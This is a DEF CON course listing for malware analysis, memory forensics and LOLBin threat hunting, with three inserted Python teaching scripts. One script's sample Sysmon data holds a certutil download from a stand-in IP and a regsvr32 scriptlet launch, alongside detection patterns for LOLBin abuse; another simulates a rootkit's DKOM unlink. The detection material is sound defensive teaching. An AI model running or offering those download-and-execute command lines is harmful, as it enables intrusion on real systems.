A Complete Practical Approach to Malware Analysis & Threat Hunting with Memory Forensics, Endpoint Telemetry, & AI-Driven Hunting - Monnappa K A - DCTAC2025
Name of Training: A Complete Practical Approach to Malware Analysis & Threat Hunting with Memory Forensics, Endpoint Telemetry, & AI-Driven Hunting
Trainer(s): Monnappa K A and Sajan Shetty
Dates: November 3-4, 2025
Time: 8:00 am to 5:00 pm
Venue: Exhibition World Bahrain
Cost: $2,200
Course Description:
This 2-day intensive, hands-on training teaches the concepts, tools, and techniques required to analyze, investigate, and hunt malware by combining four powerful approaches: malware analysis, reverse engineering, memory forensics, and endpoint telemetry-based threat hunting. The course begins with the foundations of malware analysis, Windows internals, and memory forensics, before moving into advanced concepts of malware investigation and hunting adversary techniques.
Through real-world labs and scenarios, students will perform static, dynamic, code, and memory analysis; investigate real malware samples and infected memory images (crimeware, APT malware, rootkits, fileless threats); and analyze Sysmon/endpoint telemetry to detect persistence, lateral movement, and stealth techniques such as LOLBins abuse. By studying these behaviors, participants will gain a deep understanding of the latest adversary tactics, techniques, and procedures (TTPs) and apply this knowledge directly in investigative workflows.
What makes this training unique and future-ready is the introduction to the concept of AI-powered autonomous hunting with the Garuda Threat Hunting Framework. By integrating Garuda with Large Language Models (LLMs), participants will see how AI can accelerate event triaging, extract IOCs, map activity to MITRE ATT&CK, and even generate automated hunting reports, enabling analysts to hunt unknown threats without relying on traditional IOCs, signatures, or patterns. This demonstrates how AI augments human expertise and strengthens modern SOC operations. (AI hunting preview: https://youtu.be/Sk_c5w1CEiY)
By the end of the training, attendees will be fully equipped to detect, analyze, investigate, hunt, and respond to sophisticated cyber threats — combining hands-on technical expertise with AI-assisted hunting capabilities. These are essential skills for SOC analysts, incident responders, malware analysts, and threat hunters who want to stay ahead of today’s evolving threats.
Whether you are a beginner building your foundation or an experienced professional refining advanced skills, this training delivers the knowledge, tools, and practical labs you need to succeed.
What’s included:
Malware samples, infected memory images, course material, lab solution manual, video demos, custom scripts (including the Garuda Threat Hunting Framework with additional modules), and a preconfigured Linux VM for hands-on practice.
By the end of this training, participants will gain practical, real-world skills to:
- Build and operate a safe, isolated malware analysis lab.
- Understand malware internals, Windows internals, and adversary tradecraft.
- Perform static, dynamic, code-level, and memory-based malware analysis.
- Debug and reverse engineer malware using tools like IDA Pro and x64dbg.
- Investigate and analyze downloaders, droppers, backdoors, keyloggers, fileless malware, and rootkits.
- Detect and analyze advanced techniques such as persistence, process injection, code injection, and API hooking.
- Acquire and investigate infected memory images using Volatility and incorporate memory forensics into reverse engineering and sandbox automation workflows.
- Correlate Sysmon logs and endpoint telemetry with forensic artifacts to uncover stealth techniques (e.g., LOLBins).
- Analyze and triage network and host-based indicators (IOCs) in real-world attack scenarios.
- Hunt malware using endpoint telemetry and Sysmon logs with the Garuda Threat Hunting Framework.
- Integrate Garuda with Large Language Models (LLMs) for AI-powered autonomous hunting—accelerating event triage, IOC extraction, ATT&CK mapping, and automated report generation.
Course Outline:
The following topics will be covered in this course:
Day 1:
Introduction to Malware Analysis
- What is malware
- What malware does
- Why malware analysis
- Types of malware analysis
- Setting up an isolated lab environment
Static Analysis
- Fingerprinting the malware
- Extracting strings
- Determining File Obfuscation
- Pattern matching using YARA
- Fuzzy hashing & comparison
- Understanding PE File Characteristics
- Disassembly
- Hands-on lab exercise involves analyzing a real malware sample
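The static-analysis steps listed above (hashing, string extraction, PE header and section inspection, entropy as a packing indicator, and simple pattern matching) can be demonstrated with nothing but the Python standard library. The block below is an added example written for this page, not course material or a Garuda/Limon component: it builds a constructed, non-executable PE32+ image in memory (the `build_sample_pe` helper and its section names, strings and URL are all made up for the demo) and runs a triage pass over it. The 7.0 bits-per-byte entropy threshold and the API-name list are the usual rules of thumb, not course-specified values.

```python
"""Static triage of a PE image using only the standard library (added example, not course code)."""
import hashlib
import math
import re
import struct
from datetime import datetime, timezone

# API names that frequently appear in injectors; a hit is a lead to follow in code analysis, not proof.
INJECTION_APIS = {"CreateRemoteThread", "WriteProcessMemory", "VirtualAllocEx",
                  "NtUnmapViewOfSection", "SetWindowsHookExA", "SetWindowsHookExW", "QueueUserAPC"}
PACKED_ENTROPY = 7.0   # rule of thumb: above ~7 bits/byte a section is compressed or encrypted


def build_sample_pe() -> bytes:
    """Constructed sample (hypothetical): a minimal PE32+ with a plain '.text' section and a
    high-entropy 'UPX1' section. It only carries enough header to exercise the parser."""
    dos = (b"MZ" + bytes(58) + struct.pack("<I", 0x80)).ljust(0x80, b"\0")      # e_lfanew = 0x80
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x8664, 2, 0x5F5E1000, 0, 0, 240, 0x0022)
    opt = struct.pack("<HBBIIIIIQ", 0x20B, 14, 0, 0x200, 0x200, 0, 0x1000, 0x1000, 0x140000000)
    sect = "<8sIIIIIIHHI"
    s1 = struct.pack(sect, b".text", 0x200, 0x1000, 0x200, 0x200, 0, 0, 0, 0, 0x60000020)
    s2 = struct.pack(sect, b"UPX1", 0x200, 0x2000, 0x200, 0x400, 0, 0, 0, 0, 0xE0000040)
    headers = (dos + coff + opt.ljust(240, b"\0") + s1 + s2).ljust(0x200, b"\0")
    text = (b"CreateRemoteThread\0WriteProcessMemory\0"
            b"http://update.example.invalid/stage2.bin\0").ljust(0x200, b"\0")
    packed = b"".join(hashlib.sha256(bytes([i])).digest() for i in range(16))  # stands in for packed code
    return headers + text + packed


def shannon_entropy(data: bytes) -> float:
    """Bits per byte; 0 for an empty buffer, 8 for perfectly uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in (data.count(b) for b in set(data)))


def extract_strings(data: bytes, min_len: int = 6) -> list[str]:
    """Printable ASCII and UTF-16LE runs, as `strings -a` and `strings -el` would report them."""
    ascii_runs = [m.decode() for m in re.findall(rb"[\x20-\x7e]{%d,}" % min_len, data)]
    wide_runs = [m.decode("utf-16le") for m in re.findall(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len, data)]
    return ascii_runs + wide_runs


def parse_pe(data: bytes) -> dict:
    """Parse the DOS header, NT headers and section table; raise ValueError if this is not a PE."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    machine, nsect, stamp, _, _, opt_size, chars = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt_off = e_lfanew + 24
    magic = struct.unpack_from("<H", data, opt_off)[0]
    entry_rva = struct.unpack_from("<I", data, opt_off + 16)[0]      # AddressOfEntryPoint
    sections = []
    for i in range(nsect):
        name, vsize, va, rawsize, rawptr, *_, schars = struct.unpack_from(
            "<8sIIIIIIHHI", data, opt_off + opt_size + 40 * i)
        raw = data[rawptr:rawptr + rawsize]
        sections.append({"name": name.rstrip(b"\0").decode(errors="replace"), "va": va,
                         "raw_size": rawsize, "entropy": round(shannon_entropy(raw), 2),
                         "executable": bool(schars & 0x20000000), "writable": bool(schars & 0x80000000),
                         "has_entry": va <= entry_rva < va + max(vsize, rawsize)})
    return {"machine": machine, "pe32plus": magic == 0x20B, "characteristics": chars,
            "compile_time": datetime.fromtimestamp(stamp, timezone.utc).isoformat(),
            "entry_rva": entry_rva, "sections": sections}


def fingerprint(data: bytes) -> dict:
    """Hashes, header facts, strings and the first-pass findings an analyst would record."""
    pe = parse_pe(data)
    strings = extract_strings(data)
    apis = sorted(INJECTION_APIS.intersection(strings))
    urls = [s for s in strings if re.match(r"https?://", s)]
    findings = []
    for s in pe["sections"]:
        if s["entropy"] > PACKED_ENTROPY:
            findings.append(f"section {s['name']} has entropy {s['entropy']}: likely packed or encrypted")
        if s["executable"] and s["writable"]:
            findings.append(f"section {s['name']} is both writable and executable")
        if s["name"].upper().startswith("UPX"):
            findings.append(f"section name {s['name']} matches the UPX packer")
    if apis:
        findings.append("strings reference injection APIs: " + ", ".join(apis))
    if urls:
        findings.append("embedded URLs (network IOC candidates): " + ", ".join(urls))
    return {"size": len(data), "md5": hashlib.md5(data).hexdigest(), "sha1": hashlib.sha1(data).hexdigest(),
            "sha256": hashlib.sha256(data).hexdigest(), "pe": pe, "strings": strings,
            "injection_apis": apis, "urls": urls, "findings": findings}


if __name__ == "__main__":
    report = fingerprint(build_sample_pe())
    print(report["sha256"], report["pe"]["compile_time"])
    for line in report["findings"]:
        print(" -", line)
```

Replace `build_sample_pe()` with `open(path, "rb").read()` to run it against a real sample inside the isolated lab VM. Fuzzy hashing (ssdeep/TLSH) and YARA are deliberately not re-implemented here; both need their own libraries, and the entropy and string checks above are what you would feed into a YARA rule rather than a substitute for one.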
Dynamic Analysis/Behavioural analysis
- Dynamic Analysis Steps
- Understanding Dynamic Analysis tools
- Simulating services
- Performing Dynamic Analysis
- Monitoring process, filesystem, registry, and network activity
- Determining the Indicators of compromise (host and network indicators)
- Demo - Showing the static & dynamic analysis of real malware sample
- Hands-on lab exercise involves analyzing a real malware sample
Automating Malware Analysis (sandbox)
- Custom Sandbox Overview
- How the sandbox works
- Sandbox Features
- Demo - Analyzing malware in the custom sandbox
Code Analysis
- Code Analysis Overview
- Disassemblers & Debuggers
- Code Analysis Tools
- Basics of IDA Pro
- Basics of OllyDbg/x64dbg
- Understanding the API calls
- Reversing malware functionalities (downloader, dropper, keylogger, code injection, HTTP backdoor)
- Hands-on lab exercise involves analyzing a real malware sample
Introduction to Memory Forensics
- What is Memory Forensics
- Why Memory Forensics
- Steps in Memory Forensics
- Memory acquisition and tools
- Acquiring memory from a physical machine
- Acquiring memory from the virtual machine
- Hands-on exercise involves acquiring the memory
Volatility Overview
- Introduction to Volatility Advanced Memory Forensics Framework
- Volatility Installation
- Volatility basic commands
- Determining the profile
- Volatility help options
- Running the plugin
Day 2:
Investigating Process
- Understanding Process Internals
- Process(EPROCESS) Structure
- Process organization
- Process enumeration by walking the doubly-linked list
- Process relationships (parent-child relationship)
- Understanding DKOM attacks
- Process Enumeration using pool tag scanning
- Volatility plugins to enumerate processes
- Identifying malware process
- Hands-on lab exercise (scenario-based) involves investigating malware-infected memory
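The two enumeration methods listed above are exactly what the cross-view comparison of a list walk against a pool-tag scan is for: a DKOM rootkit unlinks its process from the active-process list, so the walk misses it while the scan still finds the object. The block below is an added example written for this page, not Volatility code or course material. It simulates the idea on a constructed "memory image": the object layout, the 16-byte pool header with its `Proc` tag, the list offset and the process list are all invented for the demo and do not match real Windows `_EPROCESS` or `_POOL_HEADER` offsets, but the walk (`CONTAINING_RECORD` from a `LIST_ENTRY` back to the object), the unlink, and the scan follow the same logic as pslist, a DKOM unlink and psscan.

```python
"""Cross-view detection of a DKOM-hidden process on a constructed memory image (added example)."""
import struct

# Constructed layout (hypothetical, not Windows offsets): each process object sits behind a
# 16-byte pool header whose 4-byte tag lives at header offset 4.
POOL_HDR = 16
POOL_TAG = b"Proc"
OBJ_FMT = "<II16sQQ"                  # Pid, ParentPid, ImageFileName, Flink, Blink
OBJ_SIZE = struct.calcsize(OBJ_FMT)   # 40 bytes
LIST_OFF = 24                         # offset of the LIST_ENTRY (Flink/Blink) inside the object
HEAD = 0                              # address of the fake PsActiveProcessHead: (Flink, Blink)
FIRST = 64                            # first pool allocation starts here
SLOT = POOL_HDR + OBJ_SIZE            # bytes per allocation

# Constructed process list: (pid, ppid, name). The last one is the rootkit's own process.
PROCS = [(4, 0, "System"), (372, 4, "smss.exe"), (540, 372, "csrss.exe"),
         (1324, 1200, "explorer.exe"), (2188, 1324, "rootkit.exe")]


def build_image(procs, hide_pid=None) -> bytes:
    """Lay the objects out in a buffer, link them in a ring through HEAD, optionally DKOM-unlink one."""
    img = bytearray(FIRST + SLOT * len(procs))
    bases = [FIRST + POOL_HDR + i * SLOT for i in range(len(procs))]
    entries = [HEAD] + [b + LIST_OFF for b in bases]          # LIST_ENTRY addresses in ring order
    for i, (base, (pid, ppid, name)) in enumerate(zip(bases, procs)):
        img[base - POOL_HDR + 4:base - POOL_HDR + 8] = POOL_TAG
        flink = entries[(i + 2) % len(entries)]
        blink = entries[i]
        struct.pack_into(OBJ_FMT, img, base, pid, ppid, name.encode(), flink, blink)
    struct.pack_into("<QQ", img, HEAD, entries[1], entries[-1])
    if hide_pid is not None:
        unlink(img, bases[[p[0] for p in procs].index(hide_pid)])
    return bytes(img)


def unlink(img: bytearray, base: int) -> None:
    """DKOM: splice the object out of the list the way a kernel rootkit does; the object stays in memory."""
    _, _, _, flink, blink = struct.unpack_from(OBJ_FMT, img, base)
    struct.pack_into("<Q", img, blink, flink)        # prev->Flink = victim->Flink
    struct.pack_into("<Q", img, flink + 8, blink)    # next->Blink = victim->Blink


def read_process(img: bytes, base: int) -> dict:
    pid, ppid, name, flink, blink = struct.unpack_from(OBJ_FMT, img, base)
    return {"pid": pid, "ppid": ppid, "name": name.rstrip(b"\0").decode(errors="replace"),
            "base": base, "flink": flink, "blink": blink}


def walk_active_list(img: bytes, max_iter: int = 4096) -> list[dict]:
    """pslist-style: follow Flink from the head; CONTAINING_RECORD(entry) = entry - LIST_OFF."""
    seen, out = set(), []
    entry = struct.unpack_from("<Q", img, HEAD)[0]
    while entry != HEAD and len(out) < max_iter:
        if entry in seen:                      # cycle that never returns to HEAD: corrupted list
            break
        seen.add(entry)
        out.append(read_process(img, entry - LIST_OFF))
        entry = struct.unpack_from("<Q", img, entry)[0]
    return out


def scan_pool_tags(img: bytes) -> list[dict]:
    """psscan-style: carve every allocation tagged 'Proc' regardless of list membership."""
    out, pos = [], img.find(POOL_TAG)
    while pos != -1:
        base = pos - 4 + POOL_HDR
        if pos >= 4 and base + OBJ_SIZE <= len(img):
            p = read_process(img, base)
            if p["name"] and p["name"].isprintable() and p["pid"] < 0x10000:   # sanity checks
                out.append(p)
        pos = img.find(POOL_TAG, pos + 1)
    return out


def find_hidden(img: bytes) -> list[dict]:
    """Cross-view: anything the scan finds that the list walk does not is a candidate hidden process."""
    listed = {p["base"] for p in walk_active_list(img)}
    return [p for p in scan_pool_tags(img) if p["base"] not in listed]


if __name__ == "__main__":
    image = build_image(PROCS, hide_pid=2188)
    print("pslist:", [p["name"] for p in walk_active_list(image)])
    print("psscan:", [p["name"] for p in scan_pool_tags(image)])
    print("hidden:", [(p["pid"], p["ppid"], p["name"]) for p in find_hidden(image)])
```

Two practitioner notes that carry over to real images: the walk keeps a visited set and an iteration cap, because a corrupted or deliberately looped list will otherwise spin forever; and the scanner validates each carved object before trusting it, because a four-byte tag will also turn up inside freed pool and unrelated data, which is why psscan output needs the same sanity checks (plausible PID, printable name, sane parent) before it is treated as a process.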
Investigating Process handles & Registry
- Objects and handles overview
- Enumerating process handles using Volatility
- Understanding Mutex
- Detecting malware presence using the mutex
- Understanding the Registry
- Investigating common registry keys using Volatility
- Detecting malware persistence
- Hands-on lab exercise (scenario-based) involves investigating malware-infected memory
Investigating Network Activities
- Understanding malware network activities
- Volatility Network Plugins
- Investigating Network connections
- Investigating Sockets
- Hands-on lab exercise (scenario-based) involves investigating malware-infected memory
Investigating Process Memory
- Process Memory Internals
- Listing DLLs using Volatility
- Identifying hidden DLLs
- Dumping malicious executable from memory
- Dumping DLLs from memory
- Scanning the memory for patterns (yarascan)
- Hands-on lab exercise (scenario-based) involves investigating malware-infected memory
Investigating User-Mode Rootkits & Fileless Malware
- Code Injection
- Types of Code Injection
- Remote DLL injection
- Remote Code Injection
- Reflective DLL injection
- Hollow process injection
- Demo - Case Study
- Hands-on lab exercise (scenario-based) involves investigating malware-infected memory
Investigating Kernel-Mode Rootkits
- Understanding Rootkits
- Understanding function call traversal in Windows
- Levels of hooking/modification on Windows
- Kernel Volatility plugins
- Hands-on lab exercise (scenario-based) involves investigating malware-infected memory
Threat Hunting Using Event Triaging
- Introduction to Sysmon
- Understanding Sysmon Events
- Introduction to Garuda Threat Hunting Framework
- Filtering Sysmon events using Garuda
- Living off the Land attacks
- Demo: Hunting LOLBins (Living off the Land Binaries) and multi-staged attacks
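The Sysmon filtering and LOLBin hunting described in this block reduces, at its core, to matching process-creation events (Sysmon Event ID 1) against image/command-line patterns and then reconstructing the parent-child chain to see the whole multi-stage sequence. The block below is an added example written for this page; it is not Garuda code and does not use the framework's modules or output format. The JSON-lines telemetry is constructed for the demo (the GUIDs, PIDs, paths and the 198.51.100.23 address are made up), and the rules and ATT&CK mappings are a small hand-picked set, not the course's rule base.

```python
"""Hunting LOLBin abuse and multi-stage chains in Sysmon Event ID 1 records (added example)."""
import json
import ntpath
import re

# Constructed sample telemetry (hypothetical): Sysmon EventID 1 fields exported as JSON lines.
# Processes are linked by ProcessGuid/ParentProcessGuid rather than PID, because PIDs get reused.
SAMPLE_EVENTS = r"""
{"EventID":1,"UtcTime":"2025-11-03 09:12:01","ProcessGuid":"{G-1}","ParentProcessGuid":"{G-0}","ProcessId":1324,"Image":"C:\\Windows\\explorer.exe","CommandLine":"C:\\Windows\\Explorer.EXE","ParentImage":"C:\\Windows\\System32\\userinit.exe"}
{"EventID":1,"UtcTime":"2025-11-03 09:14:22","ProcessGuid":"{G-2}","ParentProcessGuid":"{G-1}","ProcessId":4100,"Image":"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE","CommandLine":"\"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE\" /n \"C:\\Users\\bob\\Downloads\\invoice.docm\"","ParentImage":"C:\\Windows\\explorer.exe"}
{"EventID":1,"UtcTime":"2025-11-03 09:14:40","ProcessGuid":"{G-3}","ParentProcessGuid":"{G-2}","ProcessId":4212,"Image":"C:\\Windows\\System32\\cmd.exe","CommandLine":"cmd.exe /c start /min C:\\Users\\Public\\run.bat","ParentImage":"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE"}
{"EventID":1,"UtcTime":"2025-11-03 09:14:41","ProcessGuid":"{G-4}","ParentProcessGuid":"{G-3}","ProcessId":4230,"Image":"C:\\Windows\\System32\\certutil.exe","CommandLine":"certutil -urlcache -split -f http://198.51.100.23/a.txt C:\\Users\\Public\\a.txt","ParentImage":"C:\\Windows\\System32\\cmd.exe"}
{"EventID":1,"UtcTime":"2025-11-03 09:14:43","ProcessGuid":"{G-5}","ParentProcessGuid":"{G-3}","ProcessId":4240,"Image":"C:\\Windows\\System32\\certutil.exe","CommandLine":"certutil -decode C:\\Users\\Public\\a.txt C:\\Users\\Public\\s.sct","ParentImage":"C:\\Windows\\System32\\cmd.exe"}
{"EventID":1,"UtcTime":"2025-11-03 09:14:44","ProcessGuid":"{G-6}","ParentProcessGuid":"{G-3}","ProcessId":4255,"Image":"C:\\Windows\\System32\\regsvr32.exe","CommandLine":"regsvr32 /s /u /i:C:\\Users\\Public\\s.sct scrobj.dll","ParentImage":"C:\\Windows\\System32\\cmd.exe"}
{"EventID":1,"UtcTime":"2025-11-03 09:20:05","ProcessGuid":"{G-7}","ParentProcessGuid":"{G-1}","ProcessId":5000,"Image":"C:\\Windows\\System32\\notepad.exe","CommandLine":"notepad.exe C:\\Users\\bob\\notes.txt","ParentImage":"C:\\Windows\\explorer.exe"}
{"EventID":1,"UtcTime":"2025-11-03 09:21:30","ProcessGuid":"{G-8}","ParentProcessGuid":"{G-9}","ProcessId":5120,"Image":"C:\\Windows\\System32\\regsvr32.exe","CommandLine":"regsvr32 /s C:\\Windows\\System32\\vbscript.dll","ParentImage":"C:\\Windows\\System32\\msiexec.exe"}
"""

# (image basename, case-insensitive regex over the command line, ATT&CK technique, reason)
LOLBIN_RULES = [
    ("mshta.exe",      r"https?://|vbscript:|javascript:",  "T1218.005", "mshta running remote or inline script"),
    ("regsvr32.exe",   r"scrobj\.dll|/i:https?://",        "T1218.010", "regsvr32 scriptlet (squiblydoo) execution"),
    ("rundll32.exe",   r"javascript:|url\.dll,OpenURL",     "T1218.011", "rundll32 running script or opening a URL"),
    ("certutil.exe",   r"-urlcache|-verifyctl",             "T1105",     "certutil used to download a file"),
    ("certutil.exe",   r"-decode",                          "T1140",     "certutil used to decode a payload"),
    ("powershell.exe", r"-enc|-e\s|downloadstring|hidden",  "T1059.001", "suspicious PowerShell invocation"),
]
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def basename(path: str) -> str:
    return ntpath.basename(path).lower()


def parse_events(jsonl: str) -> list[dict]:
    return [json.loads(line) for line in jsonl.splitlines() if line.strip()]


def ancestry(event: dict, index: dict, limit: int = 16) -> list[dict]:
    """Follow ParentProcessGuid upward; returns the chain root-first, capped to survive GUID loops."""
    chain, cur = [], event
    while cur is not None and len(chain) < limit:
        chain.append(cur)
        cur = index.get(cur.get("ParentProcessGuid"))
    return list(reversed(chain))


def triage(events: list[dict]) -> list[dict]:
    """Flag LOLBin command lines and Office-to-shell parents; attach the full process chain to each hit."""
    index = {e["ProcessGuid"]: e for e in events}
    findings = []
    for e in events:
        if e.get("EventID") != 1:
            continue
        image, parent, cmd = basename(e["Image"]), basename(e.get("ParentImage", "")), e.get("CommandLine", "")
        hits = [(tid, why) for rule_image, pattern, tid, why in LOLBIN_RULES
                if image == rule_image and re.search(pattern, cmd, re.I)]
        if parent in OFFICE_APPS and image in SHELLS:
            hits.append(("T1204.002", f"{parent} spawned {image}"))
        chain = ancestry(e, index)
        for tid, why in hits:
            findings.append({"time": e["UtcTime"], "pid": e["ProcessId"], "image": image, "technique": tid,
                             "reason": why, "root_guid": chain[0]["ProcessGuid"],
                             "chain": " > ".join(basename(c["Image"]) for c in chain)})
    return findings


def multi_stage(findings: list[dict], min_techniques: int = 2) -> dict:
    """Group hits by the root of their process chain; several techniques under one root is a staged attack."""
    by_root = {}
    for f in findings:
        by_root.setdefault(f["root_guid"], set()).add(f["technique"])
    return {root: sorted(t) for root, t in by_root.items() if len(t) >= min_techniques}


if __name__ == "__main__":
    hits = triage(parse_events(SAMPLE_EVENTS))
    for h in hits:
        print(f"{h['time']} pid={h['pid']} {h['technique']:<10} {h['reason']}\n    chain: {h['chain']}")
    print("staged:", multi_stage(hits))
```

The benign regsvr32 and notepad events produce no hits, the Word-to-cmd parent relationship is reported even though cmd.exe itself is not a LOLBin, and grouping the hits by chain root turns four isolated alerts into one staged intrusion (download, decode, scriptlet execution) that started from an Office document.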
AI-Powered Threat Hunting
- Introduction to AI in threat detection & hunting
- Introduction to MCP (Model Context Protocol)
- Exposing Tools to the LLM
- Integrating the Garuda Framework with the AI application
- How Garuda + AI can triage events, identify IOCs, and map events to ATT&CK techniques
- Demo: AI-powered autonomous Threat hunting to hunt for complex attack patterns.
Difficulty Level:
This course starts with the basics and then gradually progresses into more advanced concepts, so it is suitable for both beginner and intermediate students.
Suggested Prerequisites:
- Students should be familiar with using Windows/Linux
- Students should have an understanding of basic programming concepts, while programming experience is not mandatory.
What Students Should Bring:
- Laptop with a minimum of 6GB RAM and 40GB free hard disk space
- Laptop with USB ports - lab samples and custom Linux VM will be shared via USB sticks
- VMware Workstation or VMware Fusion (even trial versions can be used)
- Windows Operating system (preferably 64-bit versions of Windows 11 or Windows 10) installed inside VMware Workstation/Fusion. Students must have full administrator access to the Windows operating system installed inside the VMware Workstation/Fusion
Registered students will be provided with a laptop setup guide containing step-by-step instructions and the required software. This will be provided 15 days before the training
Note: VMware Player or VirtualBox is not suitable for this training. Apple systems using the M1, M2, or M3 processor line cannot perform the necessary virtualization functionality; therefore, they are not suitable for this course.
Students will be provided with:
- Course material (PDF copy)
- Lab solution material
- Videos used in the course
- Malware samples used in the course/labs
- Memory Images used in the course/labs
- Linux VM (to be opened with VMware Workstation/Fusion) containing necessary tools and samples
- Custom Scripts (Including Garuda Framework and custom modules)
Trainer(s) Bio:
Monnappa K A is a security professional with over 17 years of experience in incident response, investigation & threat hunting. He previously worked for Microsoft & Cisco as a threat hunter, mainly focusing on investigation and research of advanced cyber attacks. He is the author of the best-selling book Learning Malware Analysis, and serves on the review board for Black Hat Asia, Black Hat USA, and Black Hat Europe. He is the creator of the Garuda Threat Hunting Framework, Limon Linux sandbox, and the winner of the Volatility Plugin Contest 2016. He co-founded the cybersecurity research community Cysinfo (https://www.cysinfo.com). Monnappa has trained thousands of security professionals globally through his highly acclaimed hands-on training sessions on malware analysis, reverse engineering, memory forensics, and threat hunting at major conferences such as Black Hat (USA, Europe, Asia, MEA), DEFCON, BruCON, HITB, FIRST (Forum of Incident Response and Security Teams), SEC-T, OPCDE, and 4SICS-SCADA/ICS cybersecurity summit. He has also presented at numerous security conferences, including Black Hat, DEFCON, FIRST, DSCI, National Cyber Defence Summit, Bharat NCX, and Cysinfo meetings, covering topics related to threat hunting, memory forensics, malware analysis, and reverse engineering. In addition, he has authored articles for eForensics and Hakin9 magazines. You can find some of his contributions to the community on his YouTube channel (http://www.youtube.com/c/MonnappaKA), and you can read his blog posts at https://cysinfo.com
Twitter: @monnappa22
Sajan Shetty is a cybersecurity enthusiast. He is an active member of Cysinfo, an open Cyber Security Community (https://www.cysinfo.com) committed to educating, empowering, inspiring, and equipping cybersecurity professionals and students to better fight and defend against cyber threats. He has conducted training sessions at Black Hat Asia, Black Hat USA, Black Hat Europe, DEF CON, Black Hat SecTor, Black Hat Middle East, Black Hat Spring, BruCON, and HITB. His primary fields of interest include Artificial Intelligence, malware analysis, and memory forensics. He has various certifications in machine learning and is passionate about applying machine learning techniques to solve cybersecurity problems.
Registration Terms and Conditions:
Trainings are refundable before October 2, 2025, minus a non-refundable processing fee of $250.
Trainings are non-refundable after October 2, 2025.
Training tickets may be transferred. Please email us at training@defcon.org for specifics.
If a training does not reach the minimum registration requirement, it may be cancelled. In the event the training you choose is cancelled, you will be provided the option of receiving a full refund or transferring to another training (subject to availability).
Failure to attend the training without prior written notification will be considered a no-show. No refund will be given.
By purchasing this ticket you agree to abide by the DEF CON Training Code of Conduct and the registration terms and conditions listed above.
Several breaks will be included throughout the day. Please note that food is not included.
All courses come with a certificate of completion, contingent upon attendance at all course sessions.